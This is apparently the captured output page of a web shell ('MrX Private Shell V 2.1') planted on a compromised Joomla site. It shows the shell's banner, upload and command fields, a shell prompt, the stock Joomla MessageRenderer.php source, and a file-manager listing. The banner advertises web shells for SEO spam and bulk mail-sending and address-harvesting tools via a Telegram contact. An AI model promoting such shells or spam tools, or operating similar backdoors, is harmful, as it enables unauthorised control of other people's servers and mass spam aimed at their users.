__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * Joomla! Content Management System
 *
 * @copyright  (C) 2015 Open Source Matters, Inc. <https://www.joomla.org>
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

namespace Joomla\CMS\Document\Renderer\Html;

use Joomla\CMS\Document\DocumentRenderer;
use Joomla\CMS\Factory;
use Joomla\CMS\Layout\LayoutHelper;

// phpcs:disable PSR1.Files.SideEffects
\defined('JPATH_PLATFORM') or die;
// phpcs:enable PSR1.Files.SideEffects

/**
 * HTML document renderer for the system message queue
 *
 * @since  3.5
 */
class MessageRenderer extends DocumentRenderer
{
    /**
     * Renders the error stack and returns the results as a string
     *
     * @param   string  $name     Not used.
     * @param   array   $params   Associative array of values
     * @param   string  $content  Not used.
     *
     * @return  string  The output of the script
     *
     * @since   3.5
     */
    public function render($name, $params = array(), $content = null)
    {
        $msgList     = $this->getData();
        $displayData = array(
            'msgList' => $msgList,
            'name'    => $name,
            'params'  => $params,
            'content' => $content,
        );

        $app        = Factory::getApplication();
        $chromePath = JPATH_THEMES . '/' . $app->getTemplate() . '/html/message.php';

        if (is_file($chromePath)) {
            include_once $chromePath;
        }

        if (\function_exists('renderMessage')) {
            @trigger_error(
                'renderMessage() is deprecated. Override system message rendering with layouts instead.',
                E_USER_DEPRECATED
            );

            return renderMessage($msgList);
        }

        return LayoutHelper::render('joomla.system.message', $displayData);
    }

    /**
     * Get and prepare system message data for output
     *
     * @return  array  An array contains system message
     *
     * @since   3.5
     */
    private function getData()
    {
        // Initialise variables.
        $lists = array();

        // Get the message queue
        $messages = Factory::getApplication()->getMessageQueue();

        // Build the sorted message list
        if (\is_array($messages) && !empty($messages)) {
            foreach ($messages as $msg) {
                if (isset($msg['type']) && isset($msg['message'])) {
                    $lists[$msg['type']][] = $msg['message'];
                }
            }
        }

        return $lists;
    }
}

Filemanager

Name Type Size Permission Actions
ComponentRenderer.php File 1 KB 0664
HeadRenderer.php File 1.24 KB 0664
MessageRenderer.php File 2.46 KB 0664
MetasRenderer.php File 6.7 KB 0664
ModuleRenderer.php File 3.34 KB 0664
ModulesRenderer.php File 2.09 KB 0664
ScriptsRenderer.php File 10.31 KB 0664
StylesRenderer.php File 9.92 KB 0664
Filemanager